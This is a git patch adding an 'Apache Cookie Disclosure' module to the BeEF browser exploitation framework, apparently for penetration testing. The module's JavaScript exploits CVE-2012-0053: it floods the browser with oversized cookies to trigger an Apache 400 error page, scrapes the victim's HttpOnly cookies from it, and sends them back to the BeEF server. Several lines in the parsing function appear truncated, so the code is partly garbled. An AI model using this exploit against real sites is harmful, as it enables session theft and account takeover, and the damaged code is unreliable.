From 6abb21ac5341954dbd8fdb6e832ce47223142fe1 Mon Sep 17 00:00:00 2001 From: gcatt Date: Tue, 19 Mar 2013 17:29:48 +0100 Subject: [PATCH] Module: Apache HTTP Server cookie disclosure (exploit) --- .gitignore | 2 + .../apache_cookie_disclosure/command.js | 75 +++++++++++++++++++ .../apache_cookie_disclosure/config.yaml | 15 ++++ .../apache_cookie_disclosure/module.rb | 14 ++++ 4 files changed, 106 insertions(+) create mode 100644 modules/exploits/apache_cookie_disclosure/command.js create mode 100644 modules/exploits/apache_cookie_disclosure/config.yaml create mode 100644 modules/exploits/apache_cookie_disclosure/module.rb diff --git a/.gitignore b/.gitignore index 7494b2b02..7dacad784 100644 --- a/.gitignore +++ b/.gitignore @@ -4,3 +4,5 @@ custom-config.yaml .DS_Store .gitignore .rvmrc + +*.lock diff --git a/modules/exploits/apache_cookie_disclosure/command.js b/modules/exploits/apache_cookie_disclosure/command.js new file mode 100644 index 000000000..b695e4838 --- /dev/null +++ b/modules/exploits/apache_cookie_disclosure/command.js @@ -0,0 +1,75 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +// BASED ON https://gist.github.com/1955a1c28324d4724b7b/7fe51f2a66c1d4a40a736540b3ad3fde02b7fb08 + +beef.execute(function() { + + function setCookies (good) { + + var str = ""; + + for (var i=0; i< 819; i++) { + str += "z"; + } + + for (i = 0; i < 10; i++) { + + if (good) { // Expire evil cookie + var cookie = "beef" + i + "=;expires=" + new Date(+new Date()-1).toUTCString() + "; path=/;"; + } else { // Set evil cookie + var cookie = "beef" + i + "=" + str + "; path=/"; + } + document.cookie = cookie; + } + } + + function makeRequest() { + setCookies(); + + function parseCookies () { + var cookie_dict = {}; + + // React on 400 status + if (xhr.readyState === 4 && xhr.status === 400) { + + // Replace newlines and match 
 content
+				var content = xhr.responseText.replace(/\r|\n/g,'').match(/
(.+)<\/pre>/);
+				
+				if (content.length) {
+					
+					// Remove "Cookie:" prefix
+					content = content[1].replace("Cookie: ", "");
+					
+					var cookies = content.replace(/beef\d=z+;?/g, '').split(/;/g);
+					
+					// Add cookies to object
+					for (var i=0; i", <%= @command_id %>, "cookies="+result);
+	
+			}
+		}
+		
+		// Make XHR request
+		var xhr = new XMLHttpRequest();
+		xhr.onreadystatechange = parseCookies;
+		xhr.open("GET", "/", true);
+		xhr.send(null);
+	}
+
+	makeRequest();
+
+});
\ No newline at end of file
diff --git a/modules/exploits/apache_cookie_disclosure/config.yaml b/modules/exploits/apache_cookie_disclosure/config.yaml
new file mode 100644
index 000000000..e8f0fcf47
--- /dev/null
+++ b/modules/exploits/apache_cookie_disclosure/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        apache_cookies:
+            enable: true
+            category: "Exploits"
+            name: "Apache Cookie Disclosure"
+            description: "This module exploits CVE-2012-0053 in order to read the victim's cookies, even if issued with the HttpOnly attribute. The exploit only works if the target server is running Apache HTTP Server 2.2.0 through 2.2.21."
+            authors: ["gcattani"]
+            target:
+                working: ["All"]
diff --git a/modules/exploits/apache_cookie_disclosure/module.rb b/modules/exploits/apache_cookie_disclosure/module.rb
new file mode 100644
index 000000000..22115ed86
--- /dev/null
+++ b/modules/exploits/apache_cookie_disclosure/module.rb
@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Apache_cookies < BeEF::Core::Command
+
+	def post_execute
+		content = {}
+		content['apache_cookies'] = @datastore['apache_cookies']
+		save content
+	end
+
+end